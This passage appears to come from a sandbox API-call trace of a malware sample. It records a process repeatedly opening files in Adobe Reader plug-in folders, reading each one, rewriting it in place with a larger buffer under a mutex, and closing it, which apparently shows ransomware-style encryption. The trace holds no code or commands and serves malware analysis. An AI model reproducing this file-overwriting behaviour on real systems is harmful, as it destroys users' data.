lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0092.423] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.423] ReleaseMutex (hMutex=0x168) returned 1 [0092.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.FRA", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.FRA", cchWideChar=9, lpMultiByteStr=0x1f735cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.FRA", lpUsedDefaultChar=0x0) returned 9 [0092.423] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x331f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0092.431] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0092.431] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0092.432] CloseHandle (hObject=0x1cc) returned 1 [0092.433] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0092.434] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0092.434] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xa00 [0092.434] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0092.434] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.434] ReleaseMutex (hMutex=0x168) returned 1 [0092.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.SUO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.SUO", cchWideChar=9, lpMultiByteStr=0x1f735ac, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.SUO", lpUsedDefaultChar=0x0) returned 9 [0092.434] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x331f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0092.439] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0092.439] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0092.440] CloseHandle (hObject=0x1cc) returned 1 [0092.440] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0092.441] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0092.441] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2000 [0092.441] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0092.441] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.441] ReleaseMutex (hMutex=0x168) returned 1 [0092.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.EUQ", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.EUQ", cchWideChar=10, lpMultiByteStr=0x1f7328c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mcimpp.EUQ", lpUsedDefaultChar=0x0) returned 10 [0092.441] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0092.451] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0092.451] WriteFile (in: hFile=0x1cc, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x331f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0092.452] CloseHandle (hObject=0x1cc) returned 1 [0092.452] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0092.453] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0092.453] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2000 [0092.453] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0092.453] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.453] ReleaseMutex (hMutex=0x168) returned 1 [0092.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MCIMPP.PTB", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MCIMPP.PTB", cchWideChar=10, lpMultiByteStr=0x1f7320c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MCIMPP.PTB", lpUsedDefaultChar=0x0) returned 10 [0092.454] ReadFile (in: hFile=0x1cc, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0095.554] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0095.554] WriteFile (in: hFile=0x1cc, lpBuffer=0x26956e8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesWritten=0x331f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0095.555] CloseHandle (hObject=0x1cc) returned 1 [0095.556] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0095.556] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0095.556] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xa00 [0095.557] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0095.557] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0095.557] ReleaseMutex (hMutex=0x168) returned 1 [0095.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.ESP", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.ESP", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.ESP", lpUsedDefaultChar=0x0) returned 13 [0095.557] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x331f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0095.558] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0095.559] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x331f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0095.559] CloseHandle (hObject=0x1cc) returned 1 [0095.559] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0095.559] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0095.560] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xa00 [0095.560] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0095.560] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0095.560] ReleaseMutex (hMutex=0x168) returned 1 [0095.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.NOR", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.NOR", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.NOR", lpUsedDefaultChar=0x0) returned 13 [0095.560] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x331f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0095.562] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0095.562] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0095.562] CloseHandle (hObject=0x1cc) returned 1 [0095.562] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0095.563] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0095.563] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xa00 [0095.563] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0095.563] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0095.564] ReleaseMutex (hMutex=0x168) returned 1 [0095.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.DEU", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.DEU", cchWideChar=16, lpMultiByteStr=0x1f88b2c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.DEU", lpUsedDefaultChar=0x0) returned 16 [0095.564] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x331f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0095.565] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0095.565] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x331f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0095.566] CloseHandle (hObject=0x1cc) returned 1 [0095.566] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0095.566] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0095.566] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xa00 [0095.567] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0095.567] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0095.567] ReleaseMutex (hMutex=0x168) returned 1 [0095.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.NLD", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.NLD", cchWideChar=16, lpMultiByteStr=0x1f88b2c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.NLD", lpUsedDefaultChar=0x0) returned 16 [0095.567] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x331f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0095.569] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0095.569] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x331f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0095.569] CloseHandle (hObject=0x1cc) returned 1 [0095.569] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\WindowsMedia.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_cze\\windowsmedia.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0095.570] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0095.570] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xa00 [0095.570] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0095.570] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0095.570] ReleaseMutex (hMutex=0x168) returned 1 [0095.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.CZE", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.CZE", cchWideChar=16, lpMultiByteStr=0x1f88b2c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.CZE", lpUsedDefaultChar=0x0) returned 16 [0095.570] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x331f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0095.572] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0095.572] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x331f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0095.572] CloseHandle (hObject=0x1cc) returned 1 [0095.573] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\WindowsMedia.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hun\\windowsmedia.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0095.573] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0095.573] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xa00 [0095.573] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0095.574] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0095.574] ReleaseMutex (hMutex=0x168) returned 1 [0095.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.HUN", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.HUN", cchWideChar=16, lpMultiByteStr=0x1f88b2c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.HUN", lpUsedDefaultChar=0x0) returned 16 [0095.574] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x331f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0095.575] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0095.576] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0095.576] CloseHandle (hObject=0x1cc) returned 1 [0095.576] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\WindowsMedia.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rum\\windowsmedia.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0095.577] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0095.577] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xa00 [0095.577] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0095.577] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0095.577] ReleaseMutex (hMutex=0x168) returned 1 [0095.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.RUM", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.RUM", cchWideChar=16, lpMultiByteStr=0x1f88b2c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.RUM", lpUsedDefaultChar=0x0) returned 16 [0095.577] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x331f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0095.579] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0095.579] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, 